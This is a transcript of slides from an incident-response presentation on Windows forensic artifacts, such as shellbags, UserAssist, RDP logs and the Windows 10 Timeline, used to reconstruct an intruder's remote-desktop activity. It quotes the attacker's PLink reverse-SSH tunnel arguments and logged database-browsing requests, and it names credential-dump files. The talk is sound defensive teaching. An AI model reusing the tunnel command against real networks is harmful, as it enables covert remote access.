SlideShare a Scribd company logo

Kealy OWASP interactive_artifacts

F
Frank Victory

Malware on workstations is annoying enough, but when an attacker accesses your systems using remote desktop or other interactive software, you feel down right violated. The presentation includes a technical dive into forensic artifacts generated during interactive logon sessions with multiple examples from real-life investigations. The presentation covers well known artifacts including MuiCache, UserAssist, and Windows Recycler, but also explores lesser known artifacts including the RDP Bitmap Cache, the Windows 10 Timeline, and Jumplists. Speaker Bio: Phillip Kealy is the Senior Manager for Incident Response for the Mandiant Denver and Phoenix offices and provides emergency services to clients when a security breach occurs. With over 15 years of experience in both private and public sector environments, Mr. Kealy has a background in incident response, security architecture, and networking

Technology
1 of 55
Download to read offline
1 Using Interactive Artifacts to Track Attacker Actions § Phillip Kealy
2 Overview § Background § Disclaimer § Presentation Goals § Interactive Artifact Overview § Case Study + Interactive Artifacts § Scaling Investigations using Interactive Artifacts
3 Background § Who am I? § Career - Operational - CIRT - Security Manager - Consulting
4 DISCLAIMER Case studies and examples are drawn from our experiences and activities working for a variety of customers, and do not represent our work for any one customer or set of customers. In many cases, facts have been changed to obscure the identity of our customers and individuals associated with our customers.
5 Presentation Goals § Define Methods for Interactive Logons § Provide overview of available artifacts § Methods to use multiple evidence sources to provide in-depth story
6 What are Interactive artifacts? § Forensic Artifacts that record user activity during an interactive logon session § Examples of interactive logon sessions: - Physically at the keyboard - Remote Desktop - Third Party Utilities • Screen Connect • VNC • More - PsExec
7 User Profiles What happens upon a user’s first interactive user logon? § Log Entries (More on this shortly) § Creation of user profile - “C:users%USERNAME%” - User registry hives § A user profile can prove an interactive logon occurred, even without event log evidence RDP frank ITJumpServer “C:usersfrank*” created
8 Case Study – FIN9 § Financially Motivated Attacker § Uses minimal malware for initial access and to maintain presence § Exploits business processes and systems for financial gain
9 Targeted Attack Lifecycle – FIN9 • Phishing Email • Word document with macros • Netwire • TeamViewer • ScreenConnect • EMCO • Dameware • NanoCore • MimiKatz • Keystroke logging • Fake Logon Screen • Sticky Keys • Built-in Windows Utilities • Net commands • File shares • Search for systems of interest • Legitimate Access to apps • Direct DB access using 1ClickDB • Remote Desktop • File Shares • Netwire • TeamViewer • ScreenConnect • EMCO • SoftTokenCertificate theft
10 Wipro + Brian Krebs
11 Initial Lead § Fraud Department located Unauthorized Gift Cards issued on January 22, 209 § Suspicious rewards Database interaction on January 22, 2019 traced back to WebServerA § Live response analysis indicated attacker installed 1ClickDB via a remote desktop logon session on WebServerA using Domain Admin account Frank - RDP session to install 1ClickDB occurred on January 19, 2019 between 03:44:56 UTC and 04:55:56 UTC from a system at an unknown IP address § IIS web server logs on WebServerA recorded access to 1ClickDB from the IP address of ITJumpServer - Connections to 1ClickDB webpage occurred on January 22, 2019 between 01:45:33 UTC and 02:30:12 UTC § Now what? - Live response analysis of WebServerA
12 Windows Logon Events Type 2 – Interactive - Physical console - Screen sharing - “RunAs” - PsExec Type 10 – Remote Interactive - Remote Desktop / Terminal Services Type 7 – Credentials used to unlock screen Type 12 – Cached remote interactive Type 13 – Cached unlock
13 Type 10 Logon – RDP Unknown System An account was successfully logged on. User Name: franktheadmin Domain: Rewards Logon ID: (0x0,0x151F248) Logon Type: 10 Logon Process: User32 Authentication Package: Negotiate Workstation Name: ITJumpServer Source Network Address: 192.168.1.101 RDP “Rewards” Domain Controller Security Event Log EID 4624 ITJumpServer
14 RDP Event Logs Microsoft-Windows-TerminalServices-RemoteconnectionManager/Operational Date & Time EID Message 2019-01-22 01:33:23 1149 Remote Desktop Services: User authentication succeeded: User: dave Domain: rewards Source Network Address: 192.168.1.101 2019-01-22 01:33:23 21 Remote Desktop Services: Session logon succeeded User: rewardsdave Session ID: 2 Source Network Address: 192.168.1.101 2019-01-22 02:39:45 23 Remote Desktop Services: Session logoff succeeded: User: rewardsdave Session ID: 2 2019-01-22 02:39:45 24 Remote Desktop Services: Session has been disconnected: User: rewardsdave Session ID: 2 Source Network Address: 192.168.1.101
15 User Registry Hives Users<username> Windows Vista/2008+ NTUSER.DAT HKEY_USERS<User SID>_Classes HKEY_USERS<User SID> Users<username>AppDataLocalMicrosoftWindows Windows Vista/2008+ USRCLASS.DAT Registry Hive PathsRegistry Files on Disk
16 LNK Files § Windows shortcut files § Auto-generated when file opened in Explorer § Supports “Recent Files” / “Recent Docs” functionality Windows Vista, 7, Server 2008 – LNK File Paths C:Users%USERNAME%AppDataRoamingMicrosoftWindowsRecent C:Users%USERNAME%AppDataRoamingMicrosoftOfficeRecent
17 Data within LNK Files § Full file path (local or network) § Attributes and logical size § MAC timestamps for the referenced file at the time it was last opened § Output from “lnkparse.py” lnkparse.py - sourceforge.net/projects /jafat/files/lnk-parse/
18 LNK File of interest Date & Time Timestamp File Name 2019-01-22 01:39:23 Created C:UsersdaveAppDataRoamingMicrosoftWindowsRecentresult.txt.lnk Date & Time Timestamp 2019-01-22 01:36:23 Created, Modified, Accessed C:UsersdaveDesktopresult.txt
19 Most Recently Used (MRU) Keys “RecentDocs” Recently opened files Multiple Subkeys for file types HKEY_USERS{SID}SoftwareMicrosoftWindowsCu rrentVersionExplorerRecentDocs .ini, .pem, .txt, .doc, .rdg, .zip, Folder, etc. § Binary Format § Stores most recent 10 opened files Key Last Write Registry Key Parsed MRU Value 2019-01-22 01:36:23 SoftwareMicrosoftWindowsCurrentVersionExpl orerRecentDocs.txt 0 = result.txt 2019-01-22 01:35:34 SoftwareMicrosoftWindowsCurrentVersionExpl orerRecentDocs.zip 0 = omg.zip
20 Anatomy of a Registry Key Example: Run key Key: HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun Value Name: NotMalware Value Data: C:ProgramDataTotallyMalwareEvil.exe
21 Anatomy of a Registry Key Example: Run key Key Last Modified: 2017-06-05 19:33:51 § Values inherit Last Modified time from their parent key
22 A timestamp is applied to the ‘Key’, and is updated when… 1) Key created 2) Value created/deleted 3) Data of any Value is modified Note: Registry timestamps can be modified, although this is not very common Registry Timestamps
23 Evidence of Execution Default Enabled User Agnostic All Windows Versions Execution Visibility ShimCache Yes Yes Yes Yes AmCache Yes Yes No Yes UserAssist Yes No Yes GUI only MUICache Yes No Yes GUI only Prefetch Workstations only Yes Yes Yes Windows Events No Yes Yes Yes WMI RUA No Yes Yes Yes
24 UserAssist and MUICache Tracks files opened in Windows Explorer HKCU{SID}SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist HKCU{SID}SoftwareMicrosoftWindowsShellNoRoamMUICache UserAssist One value per executable file • ROT13 encoded Number of times each program ran Last execution time MUICache One value per executable file • Clear-text Records “FileDescription” for PE files
25 UserAssist Evidence userassist v.20080726 (NTUSER.DAT) Displays contents of UserAssist Active Desktop key UserAssist (Active Desktop) SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{75048700-EF1F-11D0-9888- 006097DEACF9}Count LastWrite Time Fri Jul 29 21:46:41 2011 (UTC) Fri Jul 29 21:46:41 2017 (UTC) UEME_RUNPATH (3) UEME_RUNPATH:C:Program Files7-Zip7zFM.exe (1) Fri Jul 29 21:46:17 2017 (UTC) UEME_RUNPATH:C:Program FilesWindows NTAccessoriesWORDPAD.EXE (1) Fri Jul 29 21:44:45 2017 (UTC) UEME_RUNPIDL:%csidl2%Internet Explorer.lnk (15) UEME_RUNPATH:C:Program FilesInternet ExplorerIEXPLORE.EXE (1) Raw contents of UserAssist key Decoded UserAssist data
26 MUICache Evidence Raw contents of MUICache Key
27 Decoded User Assist Data Key Last Write Registry Key Times Executed 2019-01-22 01:36:23 {1AC14E77-02E7-4E5D-B744- 2EB1AE5198B7}msiexec.exe 1 2019-01-22 01:33:48 {1AC14E77-02E7-4E5D-B744- 2EB1AE5198B7}ServerManager.exe 1 2019-01-22 01:39:23 C:UsersdaveDesktopomg.exe 1 2019-01-22 01:43:23 {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}dssite.msc 1 2019-01-22 01:44:56 {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}dsac.exe 1 2019-01-22 02:28:01 {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}mstsc.exe 3
28 Jump Lists § Provides user quick access to recently used apps § Each user has their own jump lists § Shows evidence of accessed resources § Two types of jump lists § Requires parsing to be human readable - JumpListParser, JLECmd, jmp Automatic %APPDATA%MicrosoftWindowsRecentAutomaticDestinations Custom %APPDATA%MicrosoftWindowsRecentCustomDestinations
29 Jump Lists § Automatic – created automatically when a user interacts with a resource • Custom – created when a user “pins” an item
30 Browser History, Cache, and Downloads § User Specific Artifact § Enumerate Browsers § Extract Browsing History § Collect Browser Cache § Collect Downloaded Files
31 Web Server Side Data - Logging GET vs. POST GET Requests “Retrieve” content specified in the request address Key-value pairs passed as part of URI Fully captured in logs (cs-uri-query) Impact: Malicious activity in POST requests can be hard to detect! POST Requests Tell the server to accept the data enclosed in the packet contents Key-value pairs passed in the message body Request parameters not logged
32 Web Server Side Data - Content Encoding § Special characters in HTTP requests are URL Encoded by the web browser - % followed by ASCII character code - Spaces can be represented by %20 or + http://www.foo.com/search.aspx?name=John & Mark Co.&op=1 …is converted to (and will be logged as)… http://www.foo.com/search.aspx?name= John%20%26%20Mark%20Co.&op=1
33 GET /images/Browse.asp?sqlorderby_A="log_id"+DESC&sqlfrom_A="dbo"."<SYSTEM>_LOG" GET /images/Schema.asp GET /images/Browse.asp?sqlfrom_A="dbo"."<SYSTEM>_USERS" GET /images/Browse.asp?ocdGridMode_A=Se<SYSTEM>h&sqlfrom_A="dbo"."<SYSTEM>_USERS" GET /images/Browse.asp?sqlorderby_A=&sqlwhere_A= ("email"+Like+'NAME2@EMAIL.com%')&sqlselecthide_A=&sqlpagesize_A=10&sqlfrom_A="dbo"."<SYSTEM>_USERS" GET /images/Browse.asp?sqlorderby_A=&sqlwhere_A= ("last_name"+Like+'NAME%')&sqlselecthide_A=&sqlpagesize_A=10&sqlfrom_A="dbo"."<SYSTEM>_USERS" GET /images/Edit.asp?sqlid=1989&sqlfrom="dbo"."<SYSTEM>_USERS” &sqlorderby_A=&sqlwhere_A=("last_name"+Like+'NAME%')&sqlpagesize_A=10&sqlselecthide_A=&sqlfrom_A="dbo"."<SYSTEM>_U SERS"& GET /images/Connect.asp GET /images/Schema.asp GET /images/Edit.asp?sqlwhere=&sqlid=1989&sqlfrom="dbo"."<SYSTEM>_USERS"&sqlfrom_A="dbo"."<SYSTEM> _USERS"&sqlwhere_A=("email"+Like+'NAME@EMAIL.com%')&sqlpagesize_A=10&sqlorderby_A=&sqlselecthide_A= GET /images/Browse.asp?sqlfrom_A="dbo"."<SYSTEM>_USERS" POST /images/Command.asp?nocache=1/8/2017+12:34:10+PM
34 What do we know so far? Time Source Details 2019-01-22 01:33:23EventLog Remote Desktop Services: User authentication succeeded: User: dave Domain: rewards Source Network Address: 192.168.1.101 2019-01-22 01:33:23EventLog Remote Desktop Services: Session logon succeeded User: rewardsdave Session ID: 2 Source Network Address: 192.168.1.101 2019-01-22 01:35:34Registry:LastWrite SoftwareMicrosoftWindowsCurrentVersionExplorerRecentDocs.zip -> omg.zip 2019-01-22 01:39:03LNK:Create Time C:UsersdaveDesktopresults.txt (C:UsersdaveAppDataRoamingMicrosoftWindowsRecentresult.txt.lnk) 2019-01-22 01:39:23FN:Create Time C:UsersdaveAppDataRoamingMicrosoftWindowsRecentresult.txt.lnk 2019-01-22 01:39:23Registry:LastWrite SoftwareMicrosoftWindowsCurrentVersionExplorerRecentDocs.txt -> result.txt 2019-01-22 01:39:23UserAssist:Dave C:UsersdaveDesktopomg.exe 2019-01-22 01:43:23UserAssist:Dave {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}dssite.msc 2019-01-22 01:44:56UserAssist:Dave {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}dsac.exe 2019-01-22 01:45:33IE:BrowserCache Earliest Browser Cache Artifact Created 2019-01-22 02:28:01UserAssist:Dave {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}mstsc.exe 2019-01-22 02:30:12IE:BrowserCache Most Recent Browser Artifact Modified 2019-01-22 02:39:45EventLog Remote Desktop Services: Session logoff succeeded: User: rewardsdave Session ID: 2 2019-01-22 02:39:45EventLog Remote Desktop Services: Session has been disconnected: User: rewardsdave Session ID: 2 Source Network Address: 192.168.1.101 § What next?
35 Attack Diagram Database Server Web Server Jump Server Unknown System Remote Desktop Web Access 1ClickDB Direct DB Access
36 RDP Event Logs Microsoft-Windows-TerminalServices-RemoteconnectionManager/Operational Date & Time EID Message 2018-12-24 23:11:21 1149 Remote Desktop Services: User authentication succeeded: User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1 2019-01-22 00:23:33 1149 Remote Desktop Services: User authentication succeeded: User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1
37 RDP MRU Keys
38 RDP MRU Keys Key Last Write Registry Key 2018-12-25 00:00:23 Hostname: 192.168.1.38 User: rewardsITAdmin 2018-12-25 00:33:42 Hostname: RewardsDB User: rewardsDBO 2019-01-01 02:53:11 Hostname: Webserver2 User: rewardsfrank 2019-01-15 00:15:01 Hostname: ITJumpserver User: rewardsdave
39 RDP Bitmap Cache Files § Store frequently used images used during RDP session § Improves user experience § Located at: - C:Users<username>AppDataLocalMicrosoftTerminal Server ClientCachebcache2.bmc - C:Users<username>AppDataLocalMicrosoftTerminal Server ClientCacheCache[0-9]{4}.bin
40
41 Uninstall or Disable Endpoint Agents
42 Registry Shellbags § Windows Explorer usage § Records size, position, view of windows § Provides evidence of user access to local & remote directories HKEY_USERS{SID}SoftwareMicrosoftWindowsShell HKEY_USERS{SID}SoftwareMicrosoftWindowsShellNoRoam Users<username>AppDataLocalMicrosoftWindows Windows Vista/2008+ USRCLASS.DAT
43 Registry Shellbags Decoded shellbag keys can provide - Paths to directories accessed via Explorer - Date and time at which last access occurred - MAC times of each path tracked in shellbags Decoding tools - RegRipper - shellbags.py github.com/williballenthin/shellbags - ShellBagsExplorer • https://ericzimmerman.github.io/#!index.md
44 ShellBags MRU Time Modified Accessed Created Resource 2019-01-11 03:51:36 2018-12-30 02:59:32 2016-12-30 02:59:32 2017-11-05 14:40:54 My ComputerC:UsersITAdmin [Desktop0043] 2019-01-11 03:51:54 2018-05-07 15:54:36 2016-11-05 14:40:54 2017-11-05 14:40:54 My ComputerC:UsersITAdminAppData [Desktop00430] My Network Placeshqdc1.comhqdc1.comgeneral [Desktop240] 2018-12-25 02:40:59 2012-11-11 17:00:06 2012-11-11 17:00:06 2012-11-11 17:00:06 My Network Placeshqdc1.comhqdc1.comgeneralDC01 [Desktop2400] 2018-12-25 02:40:59 2014-05-23 21:53:24 2018-05-23 21:53:24 2011-04-07 12:28:28 My Network Placeshqdc1.comhqdc1.comgeneralDC01ITIO Server Infrastructure [ 2019-01-12 03:41:41 2017-01-10 14:07:12 2017-01-10 14:07:12 2017-05-02 13:45:42 My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktop [Desktop290000] 2019-01-12 03:42:22 2017-01-11 18:42:04 2017-01-11 18:42:04 2017-01-10 14:06:56 My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopVDI [Desktop2900000] 2019-01-12 03:47:49 2017-01-05 21:37:52 2017-01-05 21:37:52 2017-01-05 20:05:26 My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopAD Resumes [Desktop2900001] 2019-01-12 03:41:42 2016-12-18 14:49:14 2016-12-18 14:49:14 2015-01-26 19:43:56 My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopMy Impo'tant stuff [Desktop2900002] 2019-01-12 03:53:14 2016-12-15 20:57:58 2016-12-15 20:57:58 2016-11-24 22:18:00 My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopO365 [Desktop2900003] 2019-01-12 03:53:47 2015-09-23 13:52:10 2015-09-23 13:52:10 2016-05-02 13:45:42 My Network Places192.168.1.54192.168.1.54c$UsersfrankAppData [Desktop290001] 2019-01-11 03:46:21 2016-09-27 13:38:42 2016-09-27 13:38:42 2016-05-02 13:45:42 My Network Places192.168.1.54192.168.1.54c$UsersfrankAppDataRoaming [Desktop2900010]
45 How did the attacker access the host? § Remotely installed ScreenConnect § Switched Tactics and removed ScreenConnect/Installed malware § Non-Interactive malware used to download and execute PLink.exe to create tunnel - tunnel@<IP Address> -pw <Password> -P 443 -2 -4 -T -N -C -R 44489:127.0.0.1:3389 § Connected to local host using remote desktop Key Value Data SoftwareSimonTatham PuTTYSshHostKeys rsa2@<IP Address> 0x10001,0x SSH Public Key
46 Windows 10 Timeline § Timeline exists in Task View - Accessed by hitting Win+Tab § Records timeline of user activity for specific applications § User Engaged § Generic Events § Database location: - C:UsersUserAppDataLocalConnectedDevicesPlatformL.UserActivitiesCache.db
47 Windows Timeline https://cclgroupltd.com/windows-10-timeline-forensic-artefacts/
48 Windows Timeline https://cclgroupltd.com/windows-10-timeline-forensic-artefacts/
49 Windows Timeline § Parsing - Multiple Available Tools • https://tzworks.net/prototype_page.php?proto_id=41 • https://github.com/log2timeline/plaso/pull/2076 • https://ericzimmerman.github.io/#!index.md - SQLite3
50 Windows 10 Timeline Start - UTC End - UTC Application DisplayText or Type Details 2019-02-08 23:04:27N/A WinRARWinRAR.exe sdl-redline.zip Z:Downloadssdl-redline.zip 2019-02-09 01:07:06N/A Cisco.AnyConnect Cisco AnyConnect Secure Mobility Client black 2019-02-10 13:09:53N/A Microsoft.MicrosoftEdge cmd - Bing https://www.bing.com/search?q=cmd&form=WNSGPH http://adaptivecards[.]io/schemas/adaptive-card.json 2019-02-10 13:10:34 2019-02-10 13:10:51Microsoft.MicrosoftEdge UserEngaged https://ericzimmerman.github.io/#!index.md 2019-02-12 13:58:46 2019-02-12 13:58:48Microsoft.MicrosoftEdge UserEngaged https://www.google.com/search?eiadd+on+vpn&oq=add +on+vpn 2019-02-12 13:59:02N/A WiresharkWireshark.exe Wireshark black 2019-02-12 18:57:11N/A WiresharkWireshark.exe 107.x.x.x-10.24.206.133- 1552495684.flow Z:Downloads107.x.x.x-10.24.206.133- 1552495684.flow 2019-02-12 19:02:27N/A WiresharkWireshark.exe 104.x.x.x-10.222.7.44- 1552442420.flow Z:Downloads104.x.x.x-10.222.7.44-1552442420.flow 2019-02-16 00:47:42N/A Microsoft.MSPaint Paint 3D black 2019-02-16 00:50:34N/A Microsoft.MSPaint Picture2.jpg Z:DesktopPicture2.jpg 2019-02-16 03:16:13N/A mspaint.exe Picture1.png Z:PresentationsDFIRPicture1.png 2019-02-16 03:16:56N/A mspaint.exe Picture2.png Z:PresentationsDFIRPicture2.png 2019-02-16 18:41:00N/A WinRARWinRAR.exe 4mXTuLp5E19cNdVvUX9jzb.zip Z:DownloadsTuLp5E19cNdVvUX9jzb.zip 2019-02-16 18:41:33N/A RedlineRedline.exe MBP0074.mans Z:MBP0074.mans
51 Attack Diagram Database Server Web Server Jump Server Conference Room Remote Desktop Web Access 1ClickDB Direct DB Access SSH Tunnel
52 Time Source System Details 2018-12-24 23:11:21EventLog ConfPC Remote Desktop Services: User authentication succeeded: User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1 2018-12-25 00:00:23RDP:MRU ConfPC Hostname:192.168.1.38 User: rewardsITAdmin 2018-12-25 00:33:42RDP:MRU ConfPC Hostname:RewardsDB User: rewardsDBO 2018-12-25 02:40:59ShellBag:MRU ConfPC My Network Placeshqdc1.comhqdc1.comgeneralDC01 [Desktop2400] 2018-12-25 02:40:59ShellBag:MRU ConfPC My Network Placeshqdc1.comhqdc1.comgeneralDC01ITIO Server Infrastructure [ 2018-12-25 02:40:59ShellBag:MRU ConfPC My Network Places192.168.1.54192.168.1.54c$UsersfrankAppData [Desktop290001] 2019-01-01 02:53:11RDP:MRU ConfPC Hostname:Webserver2 User: rewardsfrank 2019-01-11 03:46:21ShellBag:MRU ConfPC My Network Places192.168.1.54192.168.1.54c$UsersfrankAppDataRoaming [Desktop2900010] 2019-01-11 03:51:36ShellBag:MRU ConfPC My ComputerC:UsersITAdmin [Desktop0043] 2019-01-11 03:51:54ShellBag:MRU ConfPC My ComputerC:UsersITAdminAppData [Desktop00430] 2019-01-12 03:41:41ShellBag:MRU ConfPC My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktop [Desktop290000] 2019-01-12 03:41:42ShellBag:MRU ConfPC My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopMy Impo'tant stuff [Desktop2900002] 2019-01-12 03:42:22ShellBag:MRU ConfPC My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopVDI [Desktop2900000] 2019-01-12 03:47:49ShellBag:MRU ConfPC My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopAD Resumes [Desktop2900001] 2019-01-12 03:53:14ShellBag:MRU ConfPC My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopO365 [Desktop2900003] 2019-01-12 03:53:47ShellBag:MRU ConfPC My Network Placeshqdc1.comhqdc1.comgeneral [Desktop240] 2019-01-15 00:15:01RDP:MRU ConfPC Hostname:ITJumpserver User:rewardsdave 2019-01-22 00:23:33EventLog ConfPC Remote Desktop Services: User authentication succeeded: User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1 2019-01-22 01:33:23EventLog Jump Remote Desktop Services: User authentication succeeded: User: dave Domain: rewards Source Network Address: 192.168.1.101 2019-01-22 01:33:23EventLog Jump Remote Desktop Services: Session logon succeeded User: rewardsdave Session ID: 2 Source Network Address: 192.168.1.101 2019-01-22 01:35:34Registry:LastWrite Jump SoftwareMicrosoftWindowsCurrentVersionExplorerRecentDocs.zip -> omg.zip 2019-01-22 01:39:03LNK:Create Time Jump C:UsersdaveDesktopresults.txt (C:UsersdaveAppDataRoamingMicrosoftWindowsRecentresult.txt.lnk) 2019-01-22 01:39:23FN:Create Time Jump C:UsersdaveAppDataRoamingMicrosoftWindowsRecentresult.txt.lnk 2019-01-22 01:39:23Registry:LastWrite Jump SoftwareMicrosoftWindowsCurrentVersionExplorerRecentDocs.txt -> result.txt 2019-01-22 01:39:23UserAssist:Dave Jump C:UsersdaveDesktopomg.exe 2019-01-22 01:43:23UserAssist:Dave Jump {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}dssite.msc 2019-01-22 01:44:56UserAssist:Dave Jump {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}dsac.exe 2019-01-22 01:45:33IE:BrowserCache Jump Earliest Browser Cache Artifact Created 2019-01-22 02:28:01UserAssist:Dave Jump {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}mstsc.exe 2019-01-22 02:30:12IE:BrowserCache Jump Most Recent Browser Artifact Modified 2019-01-22 02:39:45EventLog Jump Remote Desktop Services: Session logoff succeeded: User: rewardsdave Session ID: 2 2019-01-22 02:39:45EventLog Jump Remote Desktop Services: Session has been disconnected: User: rewardsdave Session ID: 2 Source Network Address: 192.168.1.101 2019-01-22 02:55:45EventLog ConfPC Remote Desktop Services: Session has been disconnected: User: rewardsITAdmin Session ID: 2 Source Network Address: 127.0.0.1
53 Case Study – Expanding View § Shellbags § RDP Logs § RDP Connections § LNK Files § MRU Keys § MuiCache § Jump Lists § RDP Bitmap Cache § SimonTathom Registry Values § Windows 10 Timeline
54 Other fun Artifacts Details Windows Recycler C:$Recycle.Bin<SID> $R<RAND>.<EXT> $I<RAND>.<EXT> Browser History ftp://<AttackerWebsite> file:///C:/Windows/127.0.0.1.pwdump OpenWith Registry Keys SoftwareMicrosoftWindowsCurrentVersionExplorerFileExts .cachedumpOpenWithList .fgdump-logOpenWithList ViClient Logs C:UsersadminAppDataLocalVMwarevpxviclient-#-0000.log
55 Questions Phillip.Kealy@Mandiant.com

Recommended

BlueHat v17 || Go Hunt: An Automated Approach for Security Alert Validation
BlueHat v17 || Go Hunt: An Automated Approach for Security Alert Validation BlueHat v17 || Go Hunt: An Automated Approach for Security Alert Validation
BlueHat v17 || Go Hunt: An Automated Approach for Security Alert Validation BlueHat Security Conference
 
Vista Forensics
Vista ForensicsVista Forensics
Vista ForensicsCTIN
 
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S... BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...BlueHat Security Conference
 
CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)
CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)
CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)Sam Bowne
 
Splunk n-box-splunk conf-2017
Splunk n-box-splunk conf-2017Splunk n-box-splunk conf-2017
Splunk n-box-splunk conf-2017Mohamad Hassan
 
CNIT 128 3. Attacking iOS Applications (Part 2)
CNIT 128 3. Attacking iOS Applications (Part 2)CNIT 128 3. Attacking iOS Applications (Part 2)
CNIT 128 3. Attacking iOS Applications (Part 2)Sam Bowne
 
Windows Forensic 101
Windows Forensic 101Windows Forensic 101
Windows Forensic 101Digit Oktavianto
 
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...CODE BLUE
 

Recommended

BlueHat v17 || Go Hunt: An Automated Approach for Security Alert Validation
BlueHat v17 || Go Hunt: An Automated Approach for Security Alert Validation BlueHat v17 || Go Hunt: An Automated Approach for Security Alert Validation
BlueHat v17 || Go Hunt: An Automated Approach for Security Alert Validation BlueHat Security Conference
 
Vista Forensics
Vista ForensicsVista Forensics
Vista ForensicsCTIN
 
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S... BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...BlueHat Security Conference
 
CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)
CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)
CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)Sam Bowne
 
Splunk n-box-splunk conf-2017
Splunk n-box-splunk conf-2017Splunk n-box-splunk conf-2017
Splunk n-box-splunk conf-2017Mohamad Hassan
 
CNIT 128 3. Attacking iOS Applications (Part 2)
CNIT 128 3. Attacking iOS Applications (Part 2)CNIT 128 3. Attacking iOS Applications (Part 2)
CNIT 128 3. Attacking iOS Applications (Part 2)Sam Bowne
 
Windows Forensic 101
Windows Forensic 101Windows Forensic 101
Windows Forensic 101Digit Oktavianto
 
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...CODE BLUE
 
Social Connections 13 - Troubleshooting Connections Pink
Social Connections 13 - Troubleshooting Connections PinkSocial Connections 13 - Troubleshooting Connections Pink
Social Connections 13 - Troubleshooting Connections PinkNico Meisenzahl
 
219568662-QUICK-Cloud-Storage-Forensic-Analysis-Presentation.pptx
219568662-QUICK-Cloud-Storage-Forensic-Analysis-Presentation.pptx219568662-QUICK-Cloud-Storage-Forensic-Analysis-Presentation.pptx
219568662-QUICK-Cloud-Storage-Forensic-Analysis-Presentation.pptxSachinGosavi15
 
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced ActorsMemory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced ActorsJared Greenhill
 
Operating System Forensics
Operating System ForensicsOperating System Forensics
Operating System ForensicsArunJS5
 
CSS G11 - Set 4 (CMC 2 - Part 2).pptx
CSS G11 - Set 4 (CMC 2 - Part 2).pptxCSS G11 - Set 4 (CMC 2 - Part 2).pptx
CSS G11 - Set 4 (CMC 2 - Part 2).pptxGeraldenHampas2
 
Thick Client Penetration Testing.pdf
Thick Client Penetration Testing.pdfThick Client Penetration Testing.pdf
Thick Client Penetration Testing.pdfSouvikRoy114738
 
Windows 7 client performance talk - Jeff Stokes
Windows 7 client performance talk - Jeff StokesWindows 7 client performance talk - Jeff Stokes
Windows 7 client performance talk - Jeff StokesJeff Stokes
 
IIS Web Ecosystem
IIS Web EcosystemIIS Web Ecosystem
IIS Web EcosystemKenny Abdiel Maita
 
Presentation
PresentationPresentation
PresentationAyan Choudhury
 
Windows 7 New Features By Shraddha Shah
Windows 7 New Features By Shraddha ShahWindows 7 New Features By Shraddha Shah
Windows 7 New Features By Shraddha ShahShraddha055
 
Lesson 3 - Understanding Native Applications, Tools, Mobility, and Remote Man...
Lesson 3 - Understanding Native Applications, Tools, Mobility, and Remote Man...Lesson 3 - Understanding Native Applications, Tools, Mobility, and Remote Man...
Lesson 3 - Understanding Native Applications, Tools, Mobility, and Remote Man...Gene Carboni
 
Apache Flink for IoT: How Event-Time Processing Enables Easy and Accurate Ana...
Apache Flink for IoT: How Event-Time Processing Enables Easy and Accurate Ana...Apache Flink for IoT: How Event-Time Processing Enables Easy and Accurate Ana...
Apache Flink for IoT: How Event-Time Processing Enables Easy and Accurate Ana...Big Data Spain
 
SplunkLive! Stockholm 2015 breakout - Analytics based security
SplunkLive! Stockholm 2015 breakout - Analytics based securitySplunkLive! Stockholm 2015 breakout - Analytics based security
SplunkLive! Stockholm 2015 breakout - Analytics based securitySplunk
 
williams-wwhf-20210617-eventlogs.pdf
williams-wwhf-20210617-eventlogs.pdfwilliams-wwhf-20210617-eventlogs.pdf
williams-wwhf-20210617-eventlogs.pdfVinceVulpes
 
